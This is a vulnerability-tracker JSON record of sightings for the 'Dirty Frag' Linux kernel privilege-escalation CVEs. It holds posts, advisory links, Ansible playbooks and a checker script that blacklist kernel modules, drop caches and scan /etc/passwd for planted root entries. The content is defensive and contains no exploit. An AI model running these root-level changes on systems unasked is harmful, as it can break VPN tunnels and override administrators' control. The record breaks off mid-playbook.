{"vulnerability": "CVE-2026-43500", "sightings": [{"uuid": "533fe2b4-62e9-430e-9452-e90234fd4c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-dirty-frag-new-linux-local-privilege-escalation-vulnerability-was-disclosed", "content": "", "creation_timestamp": "2026-05-08T09:28:10.000000Z"}, {"uuid": "bfd0d374-3aa3-4935-80be-2ddde695c65d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116539044705700152", "content": "And just to clarify about \"Dirty Frag\" vs. \"Copy Fail 2\":\nDirty Frag is TWO vulnerabilities:\n\nThe xfrm-ESP Page-Cache Write vulnerability has been assigned CVE-2026-43284 and patched in mainline at f4c50a4034e6.\nThe RxRPC Page-Cache Write vulnerability has been reserved as CVE-2026-43500 for tracking; no patch exists in any tree yet.\nCopy Fail 2 is a \"clean room\" rediscovery/exploitation of f4c50a4034e6\nSince Copy Fail 2 was published to GitHub 1 hour earlier than Dirty Frag was published. The Dirty Frag writeup specifies that the embargo was broken, and as a result TWO vulnerabilities were disclosed.\nPersonally, I think that if you publish a patch for a vulnerability, and then you begin an embargo a week after it was published, that doesn't really count as an \"embargo\"? \ud83e\udd37\u200d\u2642\ufe0f\nFun stuff...", "creation_timestamp": "2026-05-08T12:51:43.777812Z"}, {"uuid": "36d81f94-7a34-4c6b-9809-5df29947a53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/kisai.me/post/3mldtc4wrns2a", "content": "\u898b\u3064\u3051\u305f\n\nCVE-2026-43284\nCVE-2026-43500\n\n\u3053\u308c\u304b\u306a", "creation_timestamp": "2026-05-08T13:24:15.860547Z"}, {"uuid": "ed2d0960-bc6e-4ab2-9d25-0e3e9915e68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/drgoon.bsky.social/post/3mldtdraztc2n", "content": "\"CVE-2026-43284 is now assigned.\n\nThat was for the first issue, and that is now fixed in the latest round of stable kernel updates. The second has CVE-2026-43500 reserved for it if you need to track this, and is not fixed in any released kernel version yet.\"", "creation_timestamp": "2026-05-08T13:25:11.509789Z"}, {"uuid": "a89a0c0a-76af-4b13-a9ad-f64ad5a1bd49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/bykvaadm/7bb8937ebc4f0485fea26fa27af4c522", "content": "- name: Mitigate DirtyFrag (CVE-2026-43284 / CVE-2026-43500)\n hosts: all\n become: true\n tasks:\n - name: Caveats\n debug:\n msg: |\n \u0412\u041d\u0418\u041c\u0410\u041d\u0418\u0415:\n - esp4/esp6: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f IPsec VPN (strongSwan, Libreswan \u0438 \u0434\u0440.) \u2014\n \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0441\u043b\u043e\u043c\u0430\u0435\u0442 \u0442\u0443\u043d\u043d\u0435\u043b\u0438. \u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0436\u0434\u0430\u0442\u044c \u043f\u0430\u0442\u0447\u0430 \u044f\u0434\u0440\u0430.\n - rxrpc: \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f AFS/Kerberos, \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\n \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c.\n - CVE-2026-43500 (rxrpc) \u043f\u043e\u043a\u0430 \u043d\u0435 \u0437\u0430\u043f\u0430\u0442\u0447\u0435\u043d \u2014 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 \u043c\u043e\u0434\u0443\u043b\u044f\n \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0437\u0430\u0449\u0438\u0442\u0430 \u0434\u043e \u0432\u044b\u0445\u043e\u0434\u0430 \u043f\u0430\u0442\u0447\u0430 \u044f\u0434\u0440\u0430.\n - \u041f\u043e\u0441\u043b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 DirtyFrag page cache \u0437\u0430\u0441\u043e\u0440\u0451\u043d \u2014 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f\n drop cache \u0438\u043b\u0438 \u0440\u0435\u0431\u0443\u0442.\n\n - name: Blacklist vulnerable modules\n copy:\n dest: /etc/modprobe.d/dirtyfrag-mitigation.conf\n content: |\n install esp4 /bin/false\n install esp6 /bin/false\n install rxrpc /bin/false\n blacklist esp4\n blacklist esp6\n blacklist rxrpc\n\n - name: Unload modules if loaded\n modprobe:\n name: \"{{ item }}\"\n state: absent\n loop: [esp4, esp6, rxrpc]\n failed_when: false\n when: ansible_facts.get('ansible_virtualization_type') != 'container'\n\n - name: Verify modules not loaded\n shell: lsmod | grep -E '^(esp4|esp6|rxrpc)\\s'\n register: check\n failed_when: check.rc == 0\n changed_when: false\n when: ansible_facts.get('ansible_virtualization_type') != 'container'", "creation_timestamp": "2026-05-08T13:41:26.000000Z"}, {"uuid": "3abd5372-7d5a-4f97-9c43-b65ef4554dd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/m3nu/d85533bbf342edd3a9426711409a1b9a", "content": "", "creation_timestamp": "2026-05-08T13:45:53.000000Z"}, {"uuid": "d8f0f8f3-863c-4d6f-a05b-b60e0ae9464e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116538375077982531", "content": "Les deux vuln\u00e9rabilit\u00e9s composant #DirtyFrag ont re\u00e7u leurs num\u00e9ros CVE :\n\ud83d\udd34 CVE-2026-43284 \u2014 xfrm-ESP Page-Cache Write (patch\u00e9 en mainline : f4c50a4034e6)\ud83d\udfe1 CVE-2026-43500 \u2014 RxRPC Page-Cache Write\nSi ce n'est pas encore fait, la mitigation reste de blacklister esp4, esp6 et rxrpc.\ud83d\udc47 https://vulnerability.circl.lu/vuln/CVE-2026-43284", "creation_timestamp": "2026-05-08T10:01:24.008399Z"}, {"uuid": "bce47242-2594-45c6-a653-5a8370c5590c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3mleevhyme22p", "content": "\"Dirty Frag\" Linux Kernel LPE Zero-Day (CVE-2026-43284, CVE-2026-43500) #patchmanagement", "creation_timestamp": "2026-05-08T18:39:18.381389Z"}, {"uuid": "24ddea41-4324-4bf1-83ce-16394de8606b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-011-vulnerabilities-affecting-linux-cve-2026-43284-cve-2026-43500", "content": "", "creation_timestamp": "2026-05-08T10:39:10.000000Z"}, {"uuid": "12cd2f25-dd57-45b7-88e0-63eafeef76d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116540434561235145", "content": "#DirtyFrag status/advisories:\nAlmaLinux:https://almalinux.org/blog/2026-05-07-dirty-frag/\nDebian:https://security-tracker.debian.org/tracker/CVE-2026-43500https://security-tracker.debian.org/tracker/CVE-2026-43284\nGentoo:https://bugs.gentoo.org/974307\nRedHat:https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2026-43284https://access.redhat.com/security/cve/cve-2026-43284nothing yet on CVE-2026-43500\nRocky:https://kb.ciq.com/article/rocky-linux/rl-dirty-frag-mitigation\nSUSE / OpenSUSE:https://www.suse.com/security/cve/CVE-2026-43500.htmlhttps://www.suse.com/security/cve/CVE-2026-43284.htmlhttps://www.suse.com/c/addressing-copy-fail2-aka-dirtyfrag-in-suse-virtualization/\nUbuntu:https://ubuntu.com/security/CVE-2026-43284https://ubuntu.com/security/CVE-2026-43500https://ubuntu.com/blog/dirty-frag-linux-vulnerability-fixes-available\nAWS:https://aws.amazon.com/security/security-bulletins/rss/2026-027-aws/ https://explore.alas.aws.amazon.com/CVE-2026-43284.html", "creation_timestamp": "2026-05-08T18:45:22.128406Z"}, {"uuid": "8af3a688-5529-41d5-9f91-5db4188a8510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/aoetk.bsky.social/post/3mldllohhqs2s", "content": "\u307e\u305f\u30ab\u30fc\u30cd\u30eb\u8106\u5f31\u6027\u3067\u3053\u3093\u306a\u306e\u304c\u51fa\u3066\u304d\u305f\u3093\u304b\u30fc\u3044\n\n/ Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) security.sios.jp/vulnerabilit...", "creation_timestamp": "2026-05-08T11:06:30.206310Z"}, {"uuid": "24f4e679-d618-45ea-9ac6-e0ec664fe8dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/aoetk.fedibird.com.ap.brid.gy/post/3mldlq5pm74r2", "content": "\u307e\u305f\u30ab\u30fc\u30cd\u30eb\u8106\u5f31\u6027\u3067\u3053\u3093\u306a\u306e\u304c\u51fa\u3066\u304d\u305f\u3093\u304b\u30fc\u3044\n\n/ Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG https://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-08T11:13:12.417376Z"}, {"uuid": "f5d79e82-0bd9-4bee-9882-e3d49f33352a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mlefaalbezb2", "content": "#DirtyFrag status/advisories:\n\nAlmaLinux:\nhttps://almalinux.org/blog/2026-05-07-dirty-frag/\n\nDebian:\nhttps://security-tracker.debian.org/tracker/CVE-2026-43500\nhttps://security-tracker.debian.org/tracker/CVE-2026-43284\n\nGentoo:\nhttps://bugs.gentoo.org/974307\n\nRedHat [\u2026]", "creation_timestamp": "2026-05-08T18:46:05.118790Z"}, {"uuid": "d8fe8370-c3e9-460c-87f5-75982966e46b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/xc78xsgzsd-droid/7bb632be2e3e341b4e8b4cc79deac739", "content": "#!/bin/sh\n# ============================================================\n# DirtyFrag Vulnerability Checker\n# CVE-2026-43284 (xfrm/ESP) + CVE-2026-43500 (rxrpc)\n# Disclosed: 2026-05-07 | No patch available yet\n# ============================================================\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'\nBLD='\\033[1m'; RST='\\033[0m'\n\nok() { printf \"${GRN}[OK]${RST} %s\\n\" \"$1\"; }\nwarn() { printf \"${YEL}[WARN]${RST} %s\\n\" \"$1\"; }\nvuln() { printf \"${RED}[VULN]${RST} %s\\n\" \"$1\"; }\ninfo() { printf \" %s\\n\" \"$1\"; }\n\necho\nprintf \"${BLD}=== DirtyFrag Vulnerability Check ===${RST}\\n\"\nprintf \" CVE-2026-43284 (ESP/xfrm) + CVE-2026-43500 (rxrpc)\\n\"\nprintf \" Kernel: %s\\n\\n\" \"$(uname -r)\"\n\nVULN_COUNT=0\n\n# \u2500\u2500 1. Mitigation already in place? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[1] Modprobe blacklist (/etc/modprobe.d/dirtyfrag.conf)${RST}\\n\"\nif [ -f /etc/modprobe.d/dirtyfrag.conf ] || \\\n grep -rq 'install esp4 /bin/false' /etc/modprobe.d/ 2>/dev/null; then\n ok \"Blacklist found \u2013 modules blocked from loading\"\n MITIGATED=1\nelse\n warn \"No blacklist found\"\n MITIGATED=0\nfi\necho\n\n# \u2500\u2500 2. Vulnerable modules currently loaded? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[2] Loaded kernel modules (esp4 / esp6 / rxrpc)${RST}\\n\"\nfor MOD in esp4 esp6 rxrpc; do\n if lsmod 2>/dev/null | grep -q \"^${MOD} \"; then\n vuln \"Module '${MOD}' is currently LOADED\"\n VULN_COUNT=$((VULN_COUNT + 1))\n else\n ok \"Module '${MOD}' not loaded\"\n fi\ndone\necho\n\n# \u2500\u2500 3. Modules available on disk? \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[3] Module files available on disk${RST}\\n\"\nKVER=$(uname -r)\nfor MOD in esp4 esp6 rxrpc; do\n FOUND=$(find /lib/modules/${KVER} -name \"${MOD}.ko\" -o -name \"${MOD}.ko.xz\" \\\n -o -name \"${MOD}.ko.zst\" 2>/dev/null | head -1)\n if [ -n \"$FOUND\" ]; then\n if [ \"$MITIGATED\" -eq 1 ]; then\n warn \"Module '${MOD}' exists on disk (but loading is blocked)\"\n info \"\u2192 $FOUND\"\n else\n vuln \"Module '${MOD}' exists and CAN be auto-loaded\"\n info \"\u2192 $FOUND\"\n VULN_COUNT=$((VULN_COUNT + 1))\n fi\n else\n ok \"Module '${MOD}' not found on disk\"\n fi\ndone\necho\n\n# \u2500\u2500 4. User namespace creation (xfrm/ESP exploit path) \u2500\u2500\u2500\u2500\nprintf \"${BLD}[4] Unprivileged user namespaces (CVE-2026-43284 path)${RST}\\n\"\nUSERNS=$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)\nif [ \"$USERNS\" = \"0\" ]; then\n ok \"user.max_user_namespaces = 0 (xfrm/ESP exploit path blocked)\"\nelse\n USERNS=${USERNS:-\"unknown\"}\n warn \"user.max_user_namespaces = ${USERNS} (ESP exploit path reachable)\"\n info \"\u2192 Ubuntu: check AppArmor profile for namespace restriction\"\nfi\n\n# AppArmor namespace restriction (Ubuntu)\nif [ -f /sys/kernel/security/apparmor/profiles ]; then\n if grep -q 'unprivileged_userns' /sys/kernel/security/apparmor/profiles 2>/dev/null || \\\n [ -f /etc/apparmor.d/tunables/userns ]; then\n ok \"AppArmor namespace restriction detected (Ubuntu-style mitigation)\"\n fi\nfi\necho\n\n# \u2500\u2500 5. rxrpc-specific check \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[5] rxrpc path (CVE-2026-43500 \u2013 no namespace needed)${RST}\\n\"\nif lsmod 2>/dev/null | grep -q '^rxrpc '; then\n vuln \"rxrpc is loaded \u2013 exploit path requires NO namespace privilege\"\n VULN_COUNT=$((VULN_COUNT + 1))\nelif find /lib/modules/${KVER} -name 'rxrpc.ko*' 2>/dev/null | grep -q .; then\n if [ \"$MITIGATED\" -eq 1 ]; then\n ok \"rxrpc available but loading is blacklisted\"\n else\n vuln \"rxrpc module present and loadable (no namespace needed to exploit)\"\n VULN_COUNT=$((VULN_COUNT + 1))\n fi\nelse\n ok \"rxrpc module not present on this system\"\nfi\necho\n\n# \u2500\u2500 6. Page cache integrity hint \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}[6] Page cache integrity check (exploit IOC)${RST}\\n\"\nPASSWD_SIZE=$(stat -c%s /etc/passwd 2>/dev/null)\nSHADOW_SIZE=$(stat -c%s /etc/shadow 2>/dev/null)\nif [ -n \"$PASSWD_SIZE\" ] && [ \"$PASSWD_SIZE\" -lt 50 ]; then\n vuln \"/etc/passwd suspiciously small (${PASSWD_SIZE} bytes) \u2013 possible tampering!\"\n VULN_COUNT=$((VULN_COUNT + 1))\nelse\n ok \"/etc/passwd size appears normal (${PASSWD_SIZE} bytes)\"\nfi\n\n# Check for unexpected root entries (new UID 0 lines)\nROOT_ENTRIES=$(grep -c ':0:' /etc/passwd 2>/dev/null)\nif [ \"$ROOT_ENTRIES\" -gt 2 ]; then\n vuln \"Multiple UID-0 entries in /etc/passwd (${ROOT_ENTRIES}) \u2013 check for backdoor!\"\n VULN_COUNT=$((VULN_COUNT + 1))\nelse\n ok \"No unexpected UID-0 entries in /etc/passwd\"\nfi\necho\n\n# \u2500\u2500 Summary \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprintf \"${BLD}=== Summary ===${RST}\\n\"\nKERNEL_YEAR=$(uname -r | grep -oE '^[0-9]+' )\nif [ \"$KERNEL_YEAR\" -ge 4 ] 2>/dev/null; then\n info \"Kernel $(uname -r) is in the affected range (since Jan 2017)\"\nelse\n info \"Kernel $(uname -r) \u2013 age unclear, manual review recommended\"\nfi\n\nif [ \"$MITIGATED\" -eq 1 ] && [ \"$VULN_COUNT\" -eq 0 ]; then\n printf \"\\n${GRN}${BLD}[RESULT] Mitigation applied \u2013 system appears protected${RST}\\n\"\n info \"\u2192 Revert /etc/modprobe.d/dirtyfrag.conf once a patched kernel is installed\"\nelif [ \"$VULN_COUNT\" -eq 0 ]; then\n printf \"\\n${YEL}${BLD}[RESULT] No active modules loaded, but no blacklist in place${RST}\\n\"\n info \"\u2192 Modules can still be auto-loaded. Apply mitigation to be safe.\"\nelse\n printf \"\\n${RED}${BLD}[RESULT] SYSTEM LIKELY VULNERABLE (${VULN_COUNT} issue(s) found)${RST}\\n\"\n info \"\u2192 Apply mitigation immediately (unless you use IPsec/kAFS):\"\n printf \"\\n\"\n printf ' sudo sh -c \"printf '\"'\"'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n'\"'\"' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true\"\\n'\n printf \"\\n\"\n info \"\u2192 Optionally drop page cache afterwards:\"\n info \" sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'\"\nfi\necho\n", "creation_timestamp": "2026-05-08T12:08:27.000000Z"}, {"uuid": "985f091e-6aa8-46a1-9953-75928b4e4f19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mlewtdz2522l", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available. \n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500). \n\nAll users should update their systems immediately to stay protected. \ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:00:14.826813Z"}, {"uuid": "12482d55-7452-4c4c-aa2c-16a3ee93e8e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww3kwwc2e", "content": "2/11\n\nThis update addresses a Linux kernel local privilege escalation attack known\n as \"Dirty Frag.\" Please note that there's a second CVE (CVE-2026-43500) that\n is not yet patched upstream.\n Mitigation: If for some reason it's not possible to upgrade the kernel right", "creation_timestamp": "2026-05-09T00:01:46.352735Z"}, {"uuid": "ba2ba09e-35ab-478b-9871-408239a00447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mleww4snfr22", "content": "3/11\n\naway you may blacklist or remove the kernel modules esp4.ko and esp6.ko\n (CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n Also remove the modules from the kernel if they have been loaded:\n rmmod esp4 esp6 rxrpc\n And, drop the file caches in case in-memory program copies", "creation_timestamp": "2026-05-09T00:01:47.498372Z"}, {"uuid": "41241fe2-fa4a-456e-a346-4cb8fa5f122d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwcbh4i22", "content": "8/11\n\nas \"Dirty Frag.\" Please note that there's a second CVE (CVE-2026-43500) that\n is not yet patched upstream.\n Mitigation: If for some reason it's not possible to upgrade the kernel right\n away you may blacklist or remove the kernel modules esp4.ko and esp6.ko", "creation_timestamp": "2026-05-09T00:01:53.070919Z"}, {"uuid": "6ca99d51-5ae7-448f-b7da-81f1b7934b05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mlewwdh2f62i", "content": "9/11\n\n(CVE-2026-43284) and rxrpc.ko (CVE-2026-43500).\n Also remove the modules from the kernel if they have been loaded:\n rmmod esp4 esp6 rxrpc\n And, drop the file caches in case in-memory program copies have already\n been compromised. Make sure possibly affected programs do not", "creation_timestamp": "2026-05-09T00:01:54.619433Z"}, {"uuid": "196ae2cb-5c94-4559-a32e-dd535a426e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/unraid.net/post/3mleyipgro32d", "content": "\ud83d\udea8 Unraid OS 7.2.6 is now available.\n\nThis is an important security release that upgrades the Linux kernel to address the \"Dirty Frag\" local privilege escalation vulnerability (CVE-2026-43284 & CVE-2026-43500). \n\nAll users should update their systems immediately to stay protected. \ud83d\udee1\ufe0f", "creation_timestamp": "2026-05-09T00:30:05.046715Z"}, {"uuid": "4c1c2a84-4c47-401c-86a2-5bbc00e3bf67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/Anarcat.kolektiva.social.ap.brid.gy/post/3mle3b6xlyga2", "content": "#Debian security team just released DSA-6253-1 which addresses #dirtyfrag local root escalation which has been issued CVE-2026-43284 and CVE-2026-43500", "creation_timestamp": "2026-05-08T15:50:40.576696Z"}, {"uuid": "912f06b3-01e7-422c-aa97-c9e8868fb824", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/sayem314/dd8d3932a2e91d6a8a454b9986f6087e", "content": "Dirty Frag is a Linux kernel local privilege escalation chain involving the IPsec ESP stack and RxRPC. If a vulnerable host runs untrusted local code, containers, CI jobs, app sandboxes, or shared shell users, treat it as urgent.\n\nThe real fix is a patched kernel from your distribution. Until Debian or Ubuntu ship fixed kernels for your release, the mitigation below blocks the affected modules:\n\n- `esp4`\n- `esp6`\n- `rxrpc`\n\nSources:\n\n- https://github.com/V4bel/dirtyfrag\n- https://dirtyfrag.io/\n- https://openwall.com/lists/oss-security/2026/05/07/10\n\n## What this disables\n\nThis mitigation disables kernel IPsec ESP and RxRPC.\n\nLikely unaffected:\n\n- HTTPS/TLS\n- SSH\n- Docker bridge networking\n- WireGuard\n- Tailscale\n- OpenVPN\n- normal web apps and APIs\n\nLikely affected:\n\n- strongSwan/libreswan IPsec tunnels using ESP\n- software depending on RxRPC or AFS\n\nCheck before applying on VPN gateways:\n\n```bash\nip xfrm state\nsystemctl list-units --type=service --all 'strongswan*' 'ipsec*' 'libreswan*' 'openafs*' 'afsd*'\nps -eo comm,args | grep -E 'strongswan|charon|pluto|ipsec|openafs|afsd|rxrpc' | grep -v grep || true\n```\n\n## Quick check\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || echo \"esp4, esp6, rxrpc are not currently loaded\"\nmodprobe -n -v esp4 2>/dev/null || true\nmodprobe -n -v esp6 2>/dev/null || true\nmodprobe -n -v rxrpc 2>/dev/null || true\n```\n\nIf one of these features is built directly into your kernel instead of available as a module, a modprobe blacklist cannot disable it. In that case, prioritize a fixed kernel and reboot.\n\n## Manual mitigation\n\n```bash\nsudo tee /etc/modprobe.d/disable-dirtyfrag.conf >/dev/null <<'EOF'\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\n\nsudo modprobe -r esp4 esp6 rxrpc 2>/dev/null || true\nsync\necho 3 | sudo tee /proc/sys/vm/drop_caches >/dev/null\n```\n\nVerify:\n\n```bash\nif grep -E '^(esp4|esp6|rxrpc) ' /proc/modules; then\n echo \"STILL LOADED: reboot or investigate module users\"\nelse\n echo \"Dirty Frag modules are not loaded\"\nfi\n\nfor module in esp4 esp6 rxrpc; do\n echo \"== $module ==\"\n modprobe -n -v \"$module\" 2>/dev/null || true\ndone\n```\n\nExpected `modprobe -n -v` output should include:\n\n```text\ninstall /bin/false\n```\n\n## Patch when your distro ships a kernel fix\n\nKeep normal security updates moving. The module block is a mitigation, not the final repair.\n\n```bash\nsudo apt update\nsudo apt full-upgrade\nsudo reboot\n```\n\nAfter reboot:\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || true\n```\n\n## Ansible playbook\n\nSave as `dirtyfrag-mitigate.yml`:\n\n```yaml\n---\n- name: Mitigate Dirty Frag CVE-2026-43284 and CVE-2026-43500\n hosts: all\n become: true\n gather_facts: false\n\n vars:\n dirtyfrag_modules:\n - esp4\n - esp6\n - rxrpc\n\n tasks:\n - name: Check active IPsec xfrm state\n ansible.builtin.command: ip xfrm state\n register: dirtyfrag_xfrm_state\n changed_when: false\n failed_when: false\n\n - name: Show active IPsec xfrm state warning\n ansible.builtin.debug:\n msg: \"Active xfrm state detected. Confirm this host is not an IPsec gateway before disabling esp4/esp6.\"\n when: dirtyfrag_xfrm_state.stdout | trim | length > 0\n\n - name: Block Dirty Frag kernel modules from loading\n ansible.builtin.copy:\n dest: /etc/modprobe.d/disable-dirtyfrag.conf\n owner: root\n group: root\n mode: \"0644\"\n content: |\n {% for module in dirtyfrag_modules %}\n install {{ module }} /bin/false\n {% endfor %}\n register: dirtyfrag_blacklist\n\n - name: Unload Dirty Frag modules if currently loaded\n community.general.modprobe:\n name: \"{{ item }}\"\n state: absent\n loop: \"{{ dirtyfrag_modules }}\"\n register: dirtyfrag_unload\n failed_when: false\n\n - name: Flush filesystem buffers before clearing page cache\n ansible.builtin.command: sync\n changed_when: false\n when: dirtyfrag_blacklist.changed or dirtyfrag_unload.changed\n\n - name: Clear page cache after mitigation changes\n ansible.builtin.command: sysctl -w vm.drop_caches=3\n changed_when: true\n when: dirtyfrag_blacklist.changed or 